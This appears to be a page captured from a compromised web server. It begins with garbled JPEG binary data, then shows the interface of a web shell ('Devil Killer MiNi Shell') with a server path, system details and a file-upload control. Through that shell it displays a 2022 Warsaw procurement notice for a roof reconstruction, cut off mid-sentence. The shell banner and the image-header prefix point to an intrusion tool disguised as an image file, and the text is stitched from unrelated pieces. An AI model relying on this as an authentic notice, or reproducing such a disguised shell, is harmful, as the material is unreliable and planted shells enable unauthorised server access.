JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220704/0023758101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Kompleksowa przebudowa dachu CePeK przy ul. Podskarbińskiej 2” w Warszawie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Urząd m.st. Warszawy Dzielnica Praga-Południe</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015259640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grochowska 274</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">03-841</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 224435509</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pragapoludnie.wzp@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pragapld.um.warszawa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Kompleksowa przebudowa dachu CePeK przy ul. Podskarbińskiej 2” w Warszawie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-38204718-f91d-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00237581</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00019968/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.38 Kompleksowa przebudowa dachu CePeK przy ul. Podskarbińskiej 2</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.um.warszawa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">SWZ Rozdz. 2 i 24 pkt 4</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zapisy dot. ochrony danych osobowych określona załącznik 14 do SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zapisy dot. ochrony danych osobowych określona załącznik 14 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UD-VI-ZP/27/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest:<br/>„Kompleksowa przebudowa dachu CePeK przy ul. Podskarbińskiej 2” w Warszawie.<br/><br/>Opis przedmiotu zamówienia:<br/><br/>1. Zakres robót budowlanych:<br/><br/>Zakres rzeczowy robót stanowiący przedmiot umowy w szczególności obejmuje:<br/>Zamówienie podstawowe (gwarantowane): zakres A (część wyższa budynku)<br/>Zamówienie opcjonalne – prawo opcji: zakres B (cześć niższa – nad salą klubową)<br/><br/>ZAKRES PKT OPIS<br/><br/>ZAKRES B 1 Przesadzenie 4 drzew<br/>ZAKRES B 2 Wymiana warstw stropodachu nad salą klubową;<br/>ZAKRES A 3 Wymiana warstw stropodachu nad 1 piętrem;<br/>ZAKRES A 4 Wymiana świetlików będących elementem systemu fasadowego;<br/>ZAKRES A 5 Wymiana wpustów dachowych;<br/>ZAKRES A 6 Wymiana okien dachowych;<br/>ZAKRES A 7 Nadbudowa ścian attykowych;<br/>ZAKRES A 8 Wymiana podkonstrukcji stalowej oraz logo budynku;<br/>ZAKRES A 9 Montaż nowej instalacji odgromowej;<br/>ZAKRES A 10 Montaż nowych elementów nawiewno-wywiewnych na dachu;<br/>ZAKRES B 11 Naprawa izolacji ściany fundamentowej – sala klubowa w przyziemiu<br/>ZAKRES B 12 Wykończenie wewnętrzne ścian– sala klubowa w przyziemiu;<br/>ZAKRES B 13 Wykończenie wewnętrzne sufitu– sala klubowa w przyziemiu;<br/>ZAKRES B 14 Wymiana okien dachowych nad salą klubową;<br/><br/>Ze względu na obecnie posiadane ograniczone środki finansowe Zamawiający planuje zastosowanie podczas postępowania<br/>przetargowego zastosowanie prawa opcji zgodnie z art. 441 ust. 1 ustawy Prawo zamówień publicznych (Dz. u. 2021 poz.<br/>1129 t.j.).<br/>Oferent przedłoży ofertę na realizację zadania podstawowego oraz poda cenę realizacji opcji. Oferent zagwarantuje cenę i<br/>możliwość ewentualnej realizacji inwestycji w dodatkowym zakresie.<br/>Zamawiający będzie miał prawo skorzystania z prawa opcji w zagwarantowanej przez oferenta cenie lub realizację<br/>przedmiotu umowy w zakresie podstawowym (gwarantowanym).<br/><br/>Zamawiający zastrzega, iż część zamówienia określona jako „Zamówienie opcjonalne – prawo opcji” jest uprawnieniem, a<br/>nie zobowiązaniem Zamawiającego. Zamawiający może nie skorzystać z prawa opcji, lub skorzystać z niego w mniejszym<br/>zakresie, w szczególności w przypadku braku lub nieposiadania środków finansowych na ten cel, a Wykonawcy nie<br/>przysługują z tego tytułu żadne roszczenia, na co Wykonawca wyraża zgodę i akceptuje warunki określone w umowie oraz<br/>dokumentacji przetargowej.<br/>Zawiadomienie o uruchomieniu prawa opcji zostanie przedstawione Wykonawcy w formie pisemnej doręczonym osobiście<br/>lub drogą elektroniczną (skan pisma przy emailu), nie później niż przed końcem terminu wykonania zamówienia<br/>podstawowego.<br/>Koszt wynagrodzenia za wybrany zakres robót opcjonalnych określa kosztorys ofertowy stanowiący załącznik nr 2 do<br/>umowy.<br/>W przypadku skorzystania przez Zamawiającego z prawa opcji Wykonawca jest zobowiązany do jego realizacji, na<br/>warunkach określonych w umowie, dokumentacji przetargowej i sporządzonej przez Wykonawcę oferty.<br/><br/>Opis przedmiotu zamówienia składa się w szczególności z:<br/><br/>a) Decyzji pozwolenia na budowę nr 165/21 z dnia 21.06.2021r. wydanej przez Prezydenta m.st. Warszawy (znak UD-VIWAB-<br/>A.6740.167.2021.JZA),<br/>b) Projektu Budowlanego będącego załącznikiem do w.w. decyzji pozwolenia na budowę (wraz ekspertyzą techniczną,<br/>analizą cieplno-wilgotnościową, opinią mykologiczną, opinią geotechniczną itp.),<br/>c) Informacji dotyczącej bezpieczeństwa i ochrony zdrowia,<br/>d) Wszystkich projektów wykonawczych będących załącznikami do SWZ tj. m.in. branża architektoniczna, branża<br/>konstrukcyjno-budowlana, branża elektryczna, branża sanitarna, oraz wszystkie inne załączone do SIWZ,<br/>e) Specyfikacji technicznych wykonania i odbioru robót budowlanych,<br/>f) Niezbędnych i istotnych zapisów w Warunkach Technicznych Wykonania i Odbioru Robót Budowlanych ITB dla robót<br/>dachowych, murowych, izolacyjnych, betonowych i wszystkich niezbędnych (poszczególne zeszyty ITB WTWiORB),<br/>g) Innych uzgodnień załączonych do SWZ.<br/><br/>Oferent ma możliwość (zaleca się, nieobowiąkowe) przed złożeniem oferty dokonać wizji lokalnej, aby sprawdzić zgodność<br/>załączonej do SWZ dokumentacji projektowej z faktycznym stanem i warunkami terenowymi. W celu umówienia terminu<br/>wizji lokalnej należy skontaktować się Centrum Promocji Kultury w Dzielnicy Praga-Południe m. st. Warszawy, ul.<br/>Podskarbińska 2, 03-833 Warszawa, tel. 22 277-08-20, email: sekretariat@cpk.art.pl.<br/><br/>2. Szczegółowy opis oraz zakres robót określają załączniki nr 9, 10, 11 i 12 do SWZ.<br/><br/>3. Dodatkowe obowiązki Wykonawcy wynikające z klauzuli społecznej w oparciu o art. 95 ust. 1 ustawy Pzp<br/>Zamawiający wymaga, aby Wykonawca lub Podwykonawca przez cały okres realizacji zamówienia zatrudniał na podstawie<br/>stosunku pracy w rozumieniu art. 22 § 1 ustawy z dnia 26.06.1974 r. Kodeks Pracy (j.t. Dz.U. z 2020 r. poz. 1320 ze zm.)<br/>pracowników/pracownika bezpośrednio realizujących prace na terenie budowy, wykonujących następujące czynności:<br/>roboty związane m.in.: z montażem pokryć dachowych, montażem świetlików i okien dachowych.<br/>Powyższy warunek zostanie spełniony poprzez nawiązanie stosunku pracy z nowymi pracownikami/pracownikiem lub<br/>wyznaczenie do realizacji zamówienia pracowników/pracownika zatrudnionych już u Wykonawcy lub Podwykonawcy.<br/>Szczegółowe wymogi określa § 5 Wzoru umowy (załącznik nr 9 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45261910-6 - Naprawa dachów</p> <p class="mb-0">45261320-3 - Kładzenie rynien</p> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamówienie opcjonalne – prawo opcji: zakres B (cześć niższa – nad salą klubową)<br/><br/>ZAKRES OPIS<br/><br/>ZAKRES B Przesadzenie 4 drzew<br/>ZAKRES B Wymiana warstw stropodachu nad salą klubową;<br/>ZAKRES B Naprawa izolacji ściany fundamentowej – sala klubowa w przyziemiu<br/>ZAKRES B Wykończenie wewnętrzne ścian– sala klubowa w przyziemiu;<br/>ZAKRES B Wykończenie wewnętrzne sufitu– sala klubowa w przyziemiu;<br/>ZAKRES B Wymiana okien dachowych nad salą klubową;<br/><br/>Ze względu na obecnie posiadane ograniczone środki finansowe Zamawiający planuje zastosowanie podczas postępowania<br/>przetargowego zastosowanie prawa opcji zgodnie z art. 441 ust. 1 ustawy Prawo zamówień publicznych (Dz. u. 2021 poz.<br/>1129 t.j.).<br/>Oferent przedłoży ofertę na realizację zadania podstawowego oraz poda cenę realizacji opcji. Oferent zagwarantuje cenę i<br/>możliwość ewentualnej realizacji inwestycji w dodatkowym zakresie.<br/>Zamawiający będzie miał prawo skorzystania z prawa opcji w zagwarantowanej przez oferenta cenie lub realizację<br/>przedmiotu umowy w zakresie podstawowym (gwarantowanym).<br/><br/>Zamawiający zastrzega, iż część zamówienia określona jako „Zamówienie opcjonalne – prawo opcji” jest uprawnieniem, a<br/>nie zobowiązaniem Zamawiającego. Zamawiający może nie skorzystać z prawa opcji, lub skorzystać z niego w mniejszym<br/>zakresie, w szczególności w przypadku braku lub nieposiadania środków finansowych na ten cel, a Wykonawcy nie<br/>przysługują z tego tytułu żadne roszczenia, na co Wykonawca wyraża zgodę i akceptuje warunki określone w umowie oraz<br/>dokumentacji przetargowej.<br/>Zawiadomienie o uruchomieniu prawa opcji zostanie przedstawione Wykonawcy w formie pisemnej doręczonym osobiście<br/>lub drogą elektroniczną (skan pisma przy emailu), nie później niż przed końcem terminu wykonania zamówienia<br/>podstawowego.<br/>Koszt wynagrodzenia za wybrany zakres robót opcjonalnych określa kosztorys ofertowy stanowiący załącznik nr 2 do<br/>umowy.<br/>W przypadku skorzystania przez Zamawiającego z prawa opcji Wykonawca jest zobowiązany do jego realizacji, na<br/>warunkach określonych w umowie, dokumentacji przetargowej i sporządzonej przez Wykonawcę oferty.<br/>Wartość zadania opcjonalnego: 540 859,15 zł netto.<br/>Termin wykonania przedmiotu umowy w ramach zamówienia podstawowego (gwarantowanego) ustala się do 12 tygodni od<br/>dnia zawarcia umowy.<br/>Termin wykonania przedmiotu umowy w ramach zamówienia opcjonalnego ustala się do 16 tygodni od dnia zawarcia<br/>umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">84 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w Rozdz. 20 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">55</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena brutto dla zadania opcjonalnego (zakres B)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia publicznego mogą się ubiegać Wykonawcy, którzy:<br/>a) nie podlegają wykluczeniu,<br/>b) spełniają warunki udziału w postępowaniu określone przez Zamawiającego w ogłoszeniu o zamówieniu i niniejszej SWZ.<br/><br/>2. Podstawy wykluczenia:<br/>a) Zamawiający wykluczy z postępowania Wykonawców, w stosunku do których zachodzą przesłanki wykluczenia wskazane<br/>w art. 108 ust. 1 ustawy Pzp,<br/>b) przesłanki określone w art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r., poz. 835).<br/><br/>3. Warunki udziału w postępowaniu:<br/>Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy na potwierdzenie zdolności<br/>technicznej lub zawodowej wykażą, że:<br/><br/>1) w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie, wykonali co najmniej 1 robotę budowlaną polegającą na budowie lub naprawie lub remoncie lub przebudowie<br/>dachu (o powierzchni co najmniej 300 m2 lub większej) pokrytego papą lub membraną, o wartości (robót budowlanych<br/>dotyczących dachu) nie mniejszej niż 400 000 zł brutto.<br/>W ramach budowy lub naprawy lub remontu lub przebudowy dachu musi dotyczyć wszystkich warstw pokrycia tj. co<br/>najmniej hydroizolacji i termoizolacji.<br/>Wyjaśnienie – warunek nie będzie spełniony dla pokrycia z blachy, blachodachówki, dachówki.<br/><br/>2) dysponują osobami, skierowanymi do realizacji niniejszego zamówienia, w szczególności odpowiedzialnymi za kierowanie<br/>robotami budowlanymi, w tym co najmniej:<br/>a) 1 osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności konstrukcyjnobudowlanej,<br/>oraz posiadającej aktualne zaświadczenie o przynależności do właściwej Izby Samorządu Zawodowego,<br/>b) 1 osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, oraz posiadającej aktualne<br/>zaświadczenie o przynależności do właściwej Izby Samorządu Zawodowego,<br/>c) 1 osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń elektrycznych i elektroenergetycznych, oraz posiadającej aktualne zaświadczenie o przynależności do<br/>właściwej Izby Samorządu Zawodowego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw do wykluczenia:<br/>a) oświadczenie potwierdzające aktualność informacji zawartych w oświadczeniu, o którym mowa Rozdz. 16 pkt 2 SWZ w zakresie<br/>podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – wg wzoru stanowiącego załącznik nr 6 do SWZ.<br/><br/>Dokument/-y należy złożyć w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym)<br/>lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę upoważnioną do reprezentowania<br/>odpowiednio Wykonawcy, Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia i/lub podmiotu udostępniającego zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu<br/>potwierdzenia spełniania warunku zdolności technicznej i zawodowej:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie.<br/>Wykaz winien zawierać m.in. rodzaj i wartość wykonanych robót, daty, miejsca wykonania i podmioty, na rzecz których roboty te<br/>zostały wykonane (wg wzoru stanowiącego załącznik nr 7 do SWZ).<br/><br/>Dokument należy złożyć w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym)<br/>lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę upoważnioną do reprezentowania<br/>Wykonawcy.<br/>Do powyższego wykazu powinny być dołączone dowody określające czy te roboty budowlane zostały wykonane należycie, w<br/>szczególności informacje o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone,<br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty<br/>budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać<br/>tych dokumentów – inne dokumenty.<br/>Dokument/-y należy złożyć w jednej z poniższych postaci:<br/>• dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym, podpisem osobistym lub podpisem zaufanym<br/>przez osobę upoważnioną do reprezentowania podmiotu, na rzecz którego roboty budowlane były wykonane – w przypadku gdy<br/>dokument został sporządzony w postaci elektronicznej,<br/>• cyfrowego odwzorowania tego dokumentu sporządzonego w postaci papierowej poświadczonego kwalifikowanym podpisem<br/>elektronicznym, podpisem osobistym lub podpisem zaufanym. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w<br/>postaci papierowej, dokonuje odpowiednio Wykonawca, Wykonawca wspólnie ubiegający się o udzielenie zamówienia, podmiot<br/>udostępniający zasoby, które każdego z nich dotyczą. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci<br/>papierowej może dokonać również notariusz.<br/><br/>b) wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności 